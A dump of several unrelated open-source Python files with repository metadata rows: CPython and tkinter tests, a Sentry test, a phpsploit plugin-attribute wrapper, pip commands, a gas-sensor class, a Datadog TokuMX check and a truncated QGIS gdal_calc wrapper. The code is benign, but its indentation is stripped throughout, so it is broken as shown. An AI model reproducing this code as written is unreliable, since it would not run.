if str(exc) == excmsg:
if verbose:
print "yes"
else:
if verbose: print 'no'
print 'Unexpected ', exception, ':', repr(str(exc))
except:
if verbose: print 'no'
print 'Unexpected exception'
raise
else:
raise TestFailed, 'did not get expected exception: %s' % excmsg
test_exc('abc %a', 1, ValueError,
"unsupported format character 'a' (0x61) at index 5")
if have_unicode:
test_exc(unicode('abc %\u3000','raw-unicode-escape'), 1, ValueError,
"unsupported format character '?' (0x3000) at index 5")
test_exc('%d', '1', TypeError, "int argument required")
test_exc('%g', '1', TypeError, "float argument required")
test_exc('no format', '1', TypeError,
"not all arguments converted during string formatting")
test_exc('no format', u'1', TypeError,
"not all arguments converted during string formatting")
test_exc(u'no format', '1', TypeError,
"not all arguments converted during string formatting")
test_exc(u'no format', u'1', TypeError,
"not all arguments converted during string formatting")
class Foobar(long):
def __oct__(self):
# Returning a non-string should not blow up.
return self + 1
test_exc('%o', Foobar(), TypeError,
"expected string or Unicode object, long found")
if sys.maxint == 2**31-1:
# crashes 2.2.1 and earlier:
try:
"%*d"%(sys.maxint, -127)
except MemoryError:
pass
else:
raise TestFailed, '"%*d"%(sys.maxint, -127) should fail'
| gpl-2.0 | 2,739,807,393,355,433,500 | 40.120968 | 149 | 0.68533 | false |
BuildingLink/sentry | tests/sentry/models/test_project.py | 8 | 1099 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from sentry.models import OrganizationMember, OrganizationMemberTeam
from sentry.testutils import TestCase
class ProjectTest(TestCase):
def test_member_set_simple(self):
user = self.create_user()
org = self.create_organization(owner=user)
team = self.create_team(organization=org)
project = self.create_project(team=team)
member = OrganizationMember.objects.get(
user=user,
organization=org,
)
OrganizationMemberTeam.objects.create(
organizationmember=member,
team=team,
)
assert list(project.member_set.all()) == [member]
def test_inactive_global_member(self):
user = self.create_user()
org = self.create_organization(owner=user)
team = self.create_team(organization=org)
project = self.create_project(team=team)
OrganizationMember.objects.get(
user=user,
organization=org,
)
assert list(project.member_set.all()) == []
| bsd-3-clause | -2,431,338,429,692,419,600 | 29.527778 | 68 | 0.626934 | false |
shiney-wh/phpsploit | src/api/plugin.py | 2 | 1672 | import re
from core import plugins
class Plugin:
"""Triggering plugin attributes.
Get attributes of the currently running plugin.
This object is generally imported like this:
>>> from api import plugin
The following attributes descriptions include some
examples, based on an imaginative plugin located at
'/home/user/phpsploit/plugins/parent_dir/foobar/' path.
ATTRIBUTES:
* name (type: str)
# Plugin name.
>>> plugin.name
'foobar'
* help (type: str)
# Plugin's docstring (detailed help).
>>> print(plugin.help)
[*] foobar: An imaginary phpsploit plugin
DESCRIPTION:
An imaginary foobar plugin description.
...
* path (type: str)
# Absolute path of plugin's root directory.
>>> plugin.path
'/home/user/phpsploit/plugins/parent_dir/foobar/'
* category (type: str)
# Plugin's category name (parent directory).
>>> plugin.category
'Parent Dir'
"""
def __init__(self):
pass
def __getattr__(self, attr):
errmsg = "type object '%s' has no attribute '%s'"
if attr in dir(self):
return getattr(plugins.current_plugin, attr)
raise AttributeError(errmsg % (self.__class__.__name__, str(attr)))
def __dir__(self):
result = []
for attr in dir(plugins.current_plugin):
obj = getattr(plugins.current_plugin, attr)
if re.match("^[a-z]+$", attr) and not callable(obj):
result.append(attr)
return result
# instanciate plugin object (for use within python API)
plugin = Plugin()
| gpl-3.0 | -5,773,520,445,400,197,000 | 25.967742 | 75 | 0.596292 | false |
cynngah/uofthacksIV | generate-jobs/lib/python2.7/site-packages/pip/commands/check.py | 336 | 1382 | import logging
from pip.basecommand import Command
from pip.operations.check import check_requirements
from pip.utils import get_installed_distributions
logger = logging.getLogger(__name__)
class CheckCommand(Command):
"""Verify installed packages have compatible dependencies."""
name = 'check'
usage = """
%prog [options]"""
summary = 'Verify installed packages have compatible dependencies.'
def run(self, options, args):
dists = get_installed_distributions(local_only=False, skip=())
missing_reqs_dict, incompatible_reqs_dict = check_requirements(dists)
for dist in dists:
key = '%s==%s' % (dist.project_name, dist.version)
for requirement in missing_reqs_dict.get(key, []):
logger.info(
"%s %s requires %s, which is not installed.",
dist.project_name, dist.version, requirement.project_name)
for requirement, actual in incompatible_reqs_dict.get(key, []):
logger.info(
"%s %s has requirement %s, but you have %s %s.",
dist.project_name, dist.version, requirement,
actual.project_name, actual.version)
if missing_reqs_dict or incompatible_reqs_dict:
return 1
else:
logger.info("No broken requirements found.")
| mit | -1,317,605,868,300,513,500 | 34.435897 | 78 | 0.61288 | false |
paran0ids0ul/infernal-twin | build/pip/build/lib.linux-i686-2.7/pip/commands/wheel.py | 239 | 7442 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
import os
import warnings
from pip.basecommand import RequirementCommand
from pip.index import PackageFinder
from pip.exceptions import CommandError, PreviousBuildDirError
from pip.req import RequirementSet
from pip.utils import import_or_raise, normalize_path
from pip.utils.build import BuildDirectory
from pip.utils.deprecation import RemovedInPip8Warning
from pip.wheel import WheelCache, WheelBuilder
from pip import cmdoptions
DEFAULT_WHEEL_DIR = os.path.join(normalize_path(os.curdir), 'wheelhouse')
logger = logging.getLogger(__name__)
class WheelCommand(RequirementCommand):
"""
Build Wheel archives for your requirements and dependencies.
Wheel is a built-package format, and offers the advantage of not
recompiling your software during every install. For more details, see the
wheel docs: http://wheel.readthedocs.org/en/latest.
Requirements: setuptools>=0.8, and wheel.
'pip wheel' uses the bdist_wheel setuptools extension from the wheel
package to build individual wheels.
"""
name = 'wheel'
usage = """
%prog [options] <requirement specifier> ...
%prog [options] -r <requirements file> ...
%prog [options] [-e] <vcs project url> ...
%prog [options] [-e] <local project path> ...
%prog [options] <archive url/path> ..."""
summary = 'Build wheels from your requirements.'
def __init__(self, *args, **kw):
super(WheelCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(
'-w', '--wheel-dir',
dest='wheel_dir',
metavar='dir',
default=DEFAULT_WHEEL_DIR,
help=("Build wheels into <dir>, where the default is "
"'<cwd>/wheelhouse'."),
)
cmd_opts.add_option(cmdoptions.use_wheel())
cmd_opts.add_option(cmdoptions.no_use_wheel())
cmd_opts.add_option(cmdoptions.no_binary())
cmd_opts.add_option(cmdoptions.only_binary())
cmd_opts.add_option(
'--build-option',
dest='build_options',
metavar='options',
action='append',
help="Extra arguments to be supplied to 'setup.py bdist_wheel'.")
cmd_opts.add_option(cmdoptions.constraints())
cmd_opts.add_option(cmdoptions.editable())
cmd_opts.add_option(cmdoptions.requirements())
cmd_opts.add_option(cmdoptions.download_cache())
cmd_opts.add_option(cmdoptions.src())
cmd_opts.add_option(cmdoptions.no_deps())
cmd_opts.add_option(cmdoptions.build_dir())
cmd_opts.add_option(
'--global-option',
dest='global_options',
action='append',
metavar='options',
help="Extra global options to be supplied to the setup.py "
"call before the 'bdist_wheel' command.")
cmd_opts.add_option(
'--pre',
action='store_true',
default=False,
help=("Include pre-release and development versions. By default, "
"pip only finds stable versions."),
)
cmd_opts.add_option(cmdoptions.no_clean())
index_opts = cmdoptions.make_option_group(
cmdoptions.index_group,
self.parser,
)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def check_required_packages(self):
import_or_raise(
'wheel.bdist_wheel',
CommandError,
"'pip wheel' requires the 'wheel' package. To fix this, run: "
"pip install wheel"
)
pkg_resources = import_or_raise(
'pkg_resources',
CommandError,
"'pip wheel' requires setuptools >= 0.8 for dist-info support."
" To fix this, run: pip install --upgrade setuptools"
)
if not hasattr(pkg_resources, 'DistInfoDistribution'):
raise CommandError(
"'pip wheel' requires setuptools >= 0.8 for dist-info "
"support. To fix this, run: pip install --upgrade "
"setuptools"
)
def run(self, options, args):
self.check_required_packages()
cmdoptions.resolve_wheel_no_use_binary(options)
cmdoptions.check_install_build_global(options)
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.info('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
if options.download_cache:
warnings.warn(
"--download-cache has been deprecated and will be removed in "
"the future. Pip now automatically uses and configures its "
"cache.",
RemovedInPip8Warning,
)
if options.build_dir:
options.build_dir = os.path.abspath(options.build_dir)
with self._build_session(options) as session:
finder = PackageFinder(
find_links=options.find_links,
format_control=options.format_control,
index_urls=index_urls,
allow_external=options.allow_external,
allow_unverified=options.allow_unverified,
allow_all_external=options.allow_all_external,
allow_all_prereleases=options.pre,
trusted_hosts=options.trusted_hosts,
process_dependency_links=options.process_dependency_links,
session=session,
)
build_delete = (not (options.no_clean or options.build_dir))
wheel_cache = WheelCache(options.cache_dir, options.format_control)
with BuildDirectory(options.build_dir,
delete=build_delete) as build_dir:
requirement_set = RequirementSet(
build_dir=build_dir,
src_dir=options.src_dir,
download_dir=None,
ignore_dependencies=options.ignore_dependencies,
ignore_installed=True,
isolated=options.isolated_mode,
session=session,
wheel_cache=wheel_cache,
wheel_download_dir=options.wheel_dir
)
self.populate_requirement_set(
requirement_set, args, options, finder, session, self.name,
wheel_cache
)
if not requirement_set.has_requirements:
return
try:
# build wheels
wb = WheelBuilder(
requirement_set,
finder,
build_options=options.build_options or [],
global_options=options.global_options or [],
)
if not wb.build():
raise CommandError(
"Failed to build one or more wheels"
)
except PreviousBuildDirError:
options.no_clean = True
raise
finally:
if not options.no_clean:
requirement_set.cleanup_files()
| gpl-3.0 | 8,197,726,181,677,401,000 | 35.660099 | 79 | 0.563558 | false |
aldarionsevero/datalogger-ROS-rasp | sensors/mq135_sensor.py | 1 | 1548 | # Copyright (c) 2015 "aldarionsevero Lucas Severo Alves
# <[email protected]>""
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from sensor import Sensor
import botbook_mcp3002 as mcp
class Mq135Sensor(Sensor):
"""docstring for Mq135Sensor"""
def __init__(self):
Sensor.__init__(self)
self.sense_pin1 = 0 # pin 7 rasp
self.gain = float(1 / 1000)
self.gain_plus = 0
self.gaslevel = 0
def read_sensor(self):
self.gaslevel = mcp.readAnalog()
return self.gaslevel
| mit | 3,128,231,726,398,340,000 | 37.7 | 79 | 0.732558 | false |
cberry777/dd-agent | checks.d/tokumx.py | 5 | 18952 | # (C) Datadog, Inc. 2014-2016
# (C) Leif Walsh <[email protected]> 2014
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import time
import types
# 3p
import bson
from pymongo import (
MongoClient,
ReadPreference,
uri_parser,
version as py_version,
)
# project
from checks import AgentCheck
DEFAULT_TIMEOUT = 10
class LocalRate:
"""To be used for metrics that should be sent as rates but that we want to send as histograms"""
def __init__(self, agent_check, metric_name, tags):
self.agent_check = agent_check
self.metric_name = metric_name
self.tags = tags
self.prev_val = None
self.cur_val = None
self.prev_ts = None
self.cur_ts = None
def submit_histogram(self):
value = float(self.cur_val - self.prev_val)/float(self.cur_ts - self.prev_ts)
self.agent_check.histogram(self.metric_name, value=value, tags=self.tags)
def submit(self, val):
if self.prev_val is None:
self.prev_val = val
self.prev_ts = time.time()
elif self.cur_val is None:
self.cur_val = val
self.cur_ts = time.time()
self.submit_histogram()
else:
self.prev_val = self.cur_val
self.prev_ts = self.cur_ts
self.cur_val = val
self.cur_ts = time.time()
self.submit_histogram()
class TokuMX(AgentCheck):
SERVICE_CHECK_NAME = 'tokumx.can_connect'
GAUGES = [
"indexCounters.btree.missRatio",
"globalLock.ratio",
"connections.current",
"connections.available",
"mem.resident",
"mem.virtual",
"mem.mapped",
"cursors.totalOpen",
"cursors.timedOut",
"uptime",
"stats.indexes",
"stats.indexSize",
"stats.objects",
"stats.dataSize",
"stats.storageSize",
"replSet.health",
"replSet.state",
"replSet.replicationLag",
"metrics.repl.buffer.count",
"metrics.repl.buffer.maxSizeBytes",
"metrics.repl.buffer.sizeBytes",
"ft.cachetable.size.current",
"ft.cachetable.size.writing",
"ft.cachetable.size.limit",
"ft.locktree.size.current",
"ft.locktree.size.limit",
"ft.compressionRatio.leaf",
"ft.compressionRatio.nonleaf",
"ft.compressionRatio.overall",
"ft.checkpoint.lastComplete.time",
"ft.alerts.locktreeRequestsPending",
"ft.alerts.checkpointFailures",
]
RATES = [
"indexCounters.btree.accesses",
"indexCounters.btree.hits",
"indexCounters.btree.misses",
"opcounters.insert",
"opcounters.query",
"opcounters.update",
"opcounters.delete",
"opcounters.getmore",
"opcounters.command",
"opcountersRepl.insert",
"opcountersRepl.query",
"opcountersRepl.update",
"opcountersRepl.delete",
"opcountersRepl.getmore",
"opcountersRepl.command",
"asserts.regular",
"asserts.warning",
"asserts.msg",
"asserts.user",
"asserts.rollovers",
"metrics.document.deleted",
"metrics.document.inserted",
"metrics.document.returned",
"metrics.document.updated",
"metrics.getLastError.wtime.num",
"metrics.getLastError.wtime.totalMillis",
"metrics.getLastError.wtimeouts",
"metrics.operation.fastmod",
"metrics.operation.idhack",
"metrics.operation.scanAndOrder",
"metrics.queryExecutor.scanned",
"metrics.record.moves",
"metrics.repl.apply.batches.num",
"metrics.repl.apply.batches.totalMillis",
"metrics.repl.apply.ops",
"metrics.repl.network.bytes",
"metrics.repl.network.getmores.num",
"metrics.repl.network.getmores.totalMillis",
"metrics.repl.network.ops",
"metrics.repl.network.readersCreated",
"metrics.repl.oplog.insert.num",
"metrics.repl.oplog.insert.totalMillis",
"metrics.repl.oplog.insertBytes",
"metrics.ttl.deletedDocuments",
"metrics.ttl.passes",
"ft.fsync.count",
"ft.fsync.time",
"ft.log.count",
"ft.log.time",
"ft.log.bytes",
"ft.cachetable.miss.count",
"ft.cachetable.miss.time",
"ft.cachetable.miss.full.count",
"ft.cachetable.miss.full.time",
"ft.cachetable.miss.partial.count",
"ft.cachetable.miss.partial.time",
"ft.cachetable.evictions.partial.nonleaf.clean.count",
"ft.cachetable.evictions.partial.nonleaf.clean.bytes",
"ft.cachetable.evictions.partial.leaf.clean.count",
"ft.cachetable.evictions.partial.leaf.clean.bytes",
"ft.cachetable.evictions.full.nonleaf.clean.count",
"ft.cachetable.evictions.full.nonleaf.clean.bytes",
"ft.cachetable.evictions.full.nonleaf.dirty.count",
"ft.cachetable.evictions.full.nonleaf.dirty.bytes",
"ft.cachetable.evictions.full.nonleaf.dirty.time",
"ft.cachetable.evictions.full.leaf.clean.count",
"ft.cachetable.evictions.full.leaf.clean.bytes",
"ft.cachetable.evictions.full.leaf.dirty.count",
"ft.cachetable.evictions.full.leaf.dirty.bytes",
"ft.cachetable.evictions.full.leaf.dirty.time",
"ft.checkpoint.count",
"ft.checkpoint.time",
"ft.checkpoint.begin.time",
"ft.checkpoint.write.nonleaf.count",
"ft.checkpoint.write.nonleaf.time",
"ft.checkpoint.write.nonleaf.bytes.uncompressed",
"ft.checkpoint.write.nonleaf.bytes.compressed",
"ft.checkpoint.write.leaf.count",
"ft.checkpoint.write.leaf.time",
"ft.checkpoint.write.leaf.bytes.uncompressed",
"ft.checkpoint.write.leaf.bytes.compressed",
"ft.serializeTime.nonleaf.serialize",
"ft.serializeTime.nonleaf.compress",
"ft.serializeTime.nonleaf.decompress",
"ft.serializeTime.nonleaf.deserialize",
"ft.serializeTime.leaf.serialize",
"ft.serializeTime.leaf.compress",
"ft.serializeTime.leaf.decompress",
"ft.serializeTime.leaf.deserialize",
"ft.alerts.longWaitEvents.logBufferWait",
"ft.alerts.longWaitEvents.fsync.count",
"ft.alerts.longWaitEvents.fsync.time",
"ft.alerts.longWaitEvents.cachePressure.count",
"ft.alerts.longWaitEvents.cachePressure.time",
"ft.alerts.longWaitEvents.checkpointBegin.count",
"ft.alerts.longWaitEvents.checkpointBegin.time",
"ft.alerts.longWaitEvents.locktreeWait.count",
"ft.alerts.longWaitEvents.locktreeWait.time",
"ft.alerts.longWaitEvents.locktreeWaitEscalation.count",
"ft.alerts.longWaitEvents.locktreeWaitEscalation.time",
]
METRICS = GAUGES + RATES
def __init__(self, name, init_config, agentConfig, instances=None):
AgentCheck.__init__(self, name, init_config, agentConfig, instances)
self._last_state_by_server = {}
self.idx_rates = {}
def get_library_versions(self):
return {"pymongo": py_version}
def check_last_state(self, state, server, agentConfig):
if self._last_state_by_server.get(server, -1) != state:
self._last_state_by_server[server] = state
return self.create_event(state, server, agentConfig)
def create_event(self, state, server, agentConfig):
"""Create an event with a message describing the replication
state of a mongo node"""
def get_state_description(state):
if state == 0:
return 'Starting Up'
elif state == 1:
return 'Primary'
elif state == 2:
return 'Secondary'
elif state == 3:
return 'Recovering'
elif state == 4:
return 'Fatal'
elif state == 5:
return 'Starting up (initial sync)'
elif state == 6:
return 'Unknown'
elif state == 7:
return 'Arbiter'
elif state == 8:
return 'Down'
elif state == 9:
return 'Rollback'
status = get_state_description(state)
msg_title = "%s is %s" % (server, status)
msg = "TokuMX %s just reported as %s" % (server, status)
self.event({
'timestamp': int(time.time()),
'event_type': 'tokumx',
'msg_title': msg_title,
'msg_text': msg,
'host': self.hostname
})
def _get_ssl_params(self, instance):
ssl_params = {
'ssl': instance.get('ssl', None),
'ssl_keyfile': instance.get('ssl_keyfile', None),
'ssl_certfile': instance.get('ssl_certfile', None),
'ssl_cert_reqs': instance.get('ssl_cert_reqs', None),
'ssl_ca_certs': instance.get('ssl_ca_certs', None)
}
for key, param in ssl_params.items():
if param is None:
del ssl_params[key]
return ssl_params
def _get_connection(self, instance, read_preference=None):
if 'server' not in instance:
raise Exception("Missing 'server' in tokumx config")
server = instance['server']
ssl_params = self._get_ssl_params(instance)
tags = instance.get('tags', [])
tags.append('server:%s' % server)
# de-dupe tags to avoid a memory leak
tags = list(set(tags))
# Configuration a URL, mongodb://user:pass@server/db
parsed = uri_parser.parse_uri(server)
username = parsed.get('username')
password = parsed.get('password')
db_name = parsed.get('database')
if not db_name:
self.log.info('No TokuMX database found in URI. Defaulting to admin.')
db_name = 'admin'
service_check_tags = [
"db:%s" % db_name
]
nodelist = parsed.get('nodelist')
if nodelist:
host = nodelist[0][0]
port = nodelist[0][1]
service_check_tags = service_check_tags + [
"host:%s" % host,
"port:%s" % port
]
do_auth = True
if username is None or password is None:
self.log.debug("TokuMX: cannot extract username and password from config %s" % server)
do_auth = False
try:
if read_preference:
conn = MongoClient(server,
socketTimeoutMS=DEFAULT_TIMEOUT*1000,
read_preference=ReadPreference.SECONDARY,
**ssl_params)
else:
conn = MongoClient(server, socketTimeoutMS=DEFAULT_TIMEOUT*1000, **ssl_params)
db = conn[db_name]
except Exception:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL, tags=service_check_tags)
raise
if do_auth:
if not db.authenticate(username, password):
message = "TokuMX: cannot connect with config %s" % server
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL, tags=service_check_tags, message=message)
raise Exception(message)
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK, tags=service_check_tags)
return server, conn, db, tags
def _get_replica_metrics(self, instance, conn, db, tags, server, status):
try:
data = {}
replSet = conn['admin'].command('replSetGetStatus')
if replSet:
primary = None
current = None
# find nodes: master and current node (ourself)
for member in replSet.get('members'):
if member.get('self'):
current = member
if int(member.get('state')) == 1:
primary = member
# If we have both we can compute a lag time
if current is not None and primary is not None:
lag = primary['optimeDate'] - current['optimeDate']
# Python 2.7 has this built in, python < 2.7 don't...
if hasattr(lag,'total_seconds'):
data['replicationLag'] = lag.total_seconds()
else:
data['replicationLag'] = (
lag.microseconds +
(lag.seconds + lag.days * 24 * 3600) * 10**6
) / 10.0**6
if current is not None:
data['health'] = current['health']
tags.append('replset:%s' % replSet['set'])
tags.append('replstate:%s' % current['stateStr'])
if current['stateStr'] == 'PRIMARY':
tags.append('role:primary')
else:
tags.append('role:secondary')
self.log.debug("Current replSet member is secondary. "
"Creating new connection to set read_preference to secondary.")
# need a new connection to deal with replica sets
server, conn, db, _ = self._get_connection(instance, read_preference=ReadPreference.SECONDARY)
data['state'] = replSet['myState']
self.check_last_state(data['state'], server, self.agentConfig)
status['replSet'] = data
except Exception as e:
if "OperationFailure" in repr(e) and "replSetGetStatus" in str(e):
pass
else:
raise e
return conn, db
def submit_idx_rate(self, metric_name, value, tags, key):
if key not in self.idx_rates:
local_rate = LocalRate(self, metric_name, tags)
self.idx_rates[key] = local_rate
else:
local_rate = self.idx_rates[key]
local_rate.submit(value)
def collect_mongos(self, server, conn, db, tags):
tags.append('role:mongos')
config = conn['config']
agg_result = config['chunks'].aggregate([{'$group': {'_id': {'ns': '$ns', 'shard': '$shard'}, 'count': {'$sum': 1}}}])
if agg_result['ok']:
for doc in agg_result['result']:
chunk_tags = list(tags)
parts = doc['_id']['ns'].split('.', 1)
chunk_tags.append('db:%s' % parts[0])
chunk_tags.append('coll:%s' % parts[1])
chunk_tags.append('shard:%s' % doc['_id']['shard'])
shard_doc = config['shards'].find_one(doc['_id']['shard'])
host_parts = shard_doc['host'].split('/', 1)
if len(host_parts) == 2:
chunk_tags.append('replset:%s' % host_parts[0])
self.gauge('tokumx.sharding.chunks', doc['count'], tags=chunk_tags)
def collect_metrics(self, instance, server, conn, db, tags):
status = db["$cmd"].find_one({"serverStatus": 1})
status['stats'] = db.command('dbstats')
# Handle replica data, if any
# See http://www.mongodb.org/display/DOCS/Replica+Set+Commands#ReplicaSetCommands-replSetGetStatus
conn, db = self._get_replica_metrics(instance, conn, db, tags, server, status)
for dbname in conn.database_names():
db_tags = list(tags)
db_tags.append('db:%s' % dbname)
db = conn[dbname]
stats = db.command('dbstats')
for m, v in stats.items():
if m in ['db', 'ok']:
continue
m = 'stats.db.%s' % m
m = self.normalize(m, 'tokumx')
# FIXME: here tokumx.stats.db.* are potentially unbounded
self.gauge(m, v, db_tags)
for collname in db.collection_names(False):
stats = db.command('collStats', collname)
for m, v in stats.items():
if m in ['db', 'ok']:
continue
if m == 'indexDetails':
for idx_stats in v:
for k in ['count', 'size', 'avgObjSize', 'storageSize']:
value = idx_stats[k]
if type(value) in (types.IntType, types.LongType, types.FloatType):
self.histogram('tokumx.stats.idx.%s' % k, idx_stats[k], tags=db_tags)
for k in ['queries', 'nscanned', 'nscannedObjects', 'inserts', 'deletes']:
key = (dbname, collname, idx_stats['name'], k)
self.submit_idx_rate('tokumx.statsd.idx.%s' % k, idx_stats[k], tags=db_tags, key=key)
# FIXME: here tokumx.stats.coll.* are potentially unbounded
elif type(v) in (types.IntType, types.LongType, types.FloatType):
self.histogram('tokumx.stats.coll.%s' % m, v, db_tags)
# If these keys exist, remove them for now as they cannot be serialized
try:
status['backgroundFlushing'].pop('last_finished')
except KeyError:
pass
try:
status.pop('localTime')
except KeyError:
pass
# Go through the metrics and save the values
for m in self.METRICS:
# each metric is of the form: x.y.z with z optional
# and can be found at status[x][y][z]
value = status
try:
for c in m.split("."):
value = value[c]
except KeyError:
continue
# value is now status[x][y][z]
if type(value) == bson.int64.Int64:
value = long(value)
else:
if type(value) not in (types.IntType, types.LongType, types.FloatType):
self.log.warning("Value found that is not of type int, int64,long, or float")
# Check if metric is a gauge or rate
if m in self.GAUGES:
self.gauge('tokumx.%s' % m, value, tags=tags)
if m in self.RATES:
self.rate('tokumx.%sps' % m, value, tags=tags)
def check(self, instance):
server, conn, db, tags = self._get_connection(instance)
if conn.is_mongos:
self.collect_mongos(server, conn, db, tags)
else:
self.collect_metrics(instance, server, conn, db, tags)
| bsd-3-clause | 8,902,282,012,258,382,000 | 37.209677 | 126 | 0.543267 | false |
paweljasinski/ironpython3 | Src/StdLib/Lib/tkinter/test/test_tkinter/test_loadtk.py | 162 | 1503 | import os
import sys
import unittest
import test.support as test_support
from tkinter import Tcl, TclError
test_support.requires('gui')
class TkLoadTest(unittest.TestCase):
@unittest.skipIf('DISPLAY' not in os.environ, 'No $DISPLAY set.')
def testLoadTk(self):
tcl = Tcl()
self.assertRaises(TclError,tcl.winfo_geometry)
tcl.loadtk()
self.assertEqual('1x1+0+0', tcl.winfo_geometry())
tcl.destroy()
def testLoadTkFailure(self):
old_display = None
if sys.platform.startswith(('win', 'darwin', 'cygwin')):
# no failure possible on windows?
# XXX Maybe on tk older than 8.4.13 it would be possible,
# see tkinter.h.
return
with test_support.EnvironmentVarGuard() as env:
if 'DISPLAY' in os.environ:
del env['DISPLAY']
# on some platforms, deleting environment variables
# doesn't actually carry through to the process level
# because they don't support unsetenv
# If that's the case, abort.
with os.popen('echo $DISPLAY') as pipe:
display = pipe.read().strip()
if display:
return
tcl = Tcl()
self.assertRaises(TclError, tcl.winfo_geometry)
self.assertRaises(TclError, tcl.loadtk)
tests_gui = (TkLoadTest, )
if __name__ == "__main__":
test_support.run_unittest(*tests_gui)
| apache-2.0 | -4,996,065,968,263,876,000 | 31.673913 | 69 | 0.582169 | false |
CS-SI/QGIS | python/plugins/processing/algs/gdal/gdalcalc.py | 7 | 7588 | # -*- coding: utf-8 -*-
"""
***************************************************************************
gdalcalc.py
---------------------
Date : Janaury 2015
Copyright : (C) 2015 by Giovanni Manghi
Email : giovanni dot manghi at naturalgis dot pt
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Giovanni Manghi'
__date__ = 'January 2015'
__copyright__ = '(C) 2015, Giovanni Manghi'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.algs.gdal.GdalUtils import GdalUtils
from processing.tools.system import isWindows
class gdalcalc(GdalAlgorithm):
INPUT_A = 'INPUT_A'
INPUT_B = 'INPUT_B'
INPUT_C = 'INPUT_C'
INPUT_D = 'INPUT_D'
INPUT_E = 'INPUT_E'
INPUT_F = 'INPUT_F'
BAND_A = 'BAND_A'
BAND_B = 'BAND_B'
BAND_C = 'BAND_C'
BAND_D = 'BAND_D'
BAND_E = 'BAND_E'
BAND_F = 'BAND_F'
FORMULA = 'FORMULA'
OUTPUT = 'OUTPUT'
NO_DATA = 'NO_DATA'
EXTRA = 'EXTRA'
RTYPE = 'RTYPE'
TYPE = ['Byte', 'Int16', 'UInt16', 'UInt32', 'Int32', 'Float32', 'Float64']
#DEBUG = 'DEBUG'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(ParameterRaster(
self.INPUT_A, self.tr('Input layer A'), False))
self.addParameter(ParameterString(self.BAND_A,
self.tr('Number of raster band for raster A'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_B, self.tr('Input layer B'), True))
self.addParameter(ParameterString(self.BAND_B,
self.tr('Number of raster band for raster B'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_C, self.tr('Input layer C'), True))
self.addParameter(ParameterString(self.BAND_C,
self.tr('Number of raster band for raster C'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_D, self.tr('Input layer D'), True))
self.addParameter(ParameterString(self.BAND_D,
self.tr('Number of raster band for raster D'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_E, self.tr('Input layer E'), True))
self.addParameter(ParameterString(self.BAND_E,
self.tr('Number of raster band for raster E'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_F, self.tr('Input layer F'), True))
self.addParameter(ParameterString(self.BAND_F,
self.tr('Number of raster band for raster F'), '1', optional=True))
self.addParameter(ParameterString(self.FORMULA,
self.tr('Calculation in gdalnumeric syntax using +-/* or any numpy array functions (i.e. logical_and())'), 'A*2', optional=False))
self.addParameter(ParameterString(self.NO_DATA,
self.tr('Set output nodata value'), '', optional=True))
self.addParameter(ParameterSelection(self.RTYPE,
self.tr('Output raster type'), self.TYPE, 5))
#self.addParameter(ParameterBoolean(
# self.DEBUG, self.tr('Print debugging information'), False))
self.addParameter(ParameterString(self.EXTRA,
self.tr('Additional creation parameters'), '', optional=True))
self.addOutput(OutputRaster(self.OUTPUT, self.tr('Calculated')))
def name(self):
return 'rastercalculator'
def displayName(self):
return self.tr('Raster calculator')
def group(self):
return self.tr('Raster miscellaneous')
def groupId(self):
return 'rastermiscellaneous'
def getConsoleCommands(self, parameters, context, feedback, executing=True):
out = self.getOutputValue(self.OUTPUT)
extra = self.getParameterValue(self.EXTRA)
if extra is not None:
extra = str(extra)
#debug = self.getParameterValue(self.DEBUG)
formula = self.getParameterValue(self.FORMULA)
noData = self.getParameterValue(self.NO_DATA)
if noData is not None:
noData = str(noData)
arguments = []
arguments.append('--calc')
arguments.append('"' + formula + '"')
arguments.append('--format')
arguments.append(GdalUtils.getFormatShortNameFromFilename(out))
arguments.append('--type')
arguments.append(self.TYPE[self.getParameterValue(self.RTYPE)])
if noData and len(noData) > 0:
arguments.append('--NoDataValue')
arguments.append(noData)
if extra and len(extra) > 0:
arguments.append(extra)
#if debug:
# arguments.append('--debug')
arguments.append('-A')
arguments.append(self.getParameterValue(self.INPUT_A))
if self.getParameterValue(self.BAND_A):
arguments.append('--A_band ' + self.getParameterValue(self.BAND_A))
if self.getParameterValue(self.INPUT_B):
arguments.append('-B')
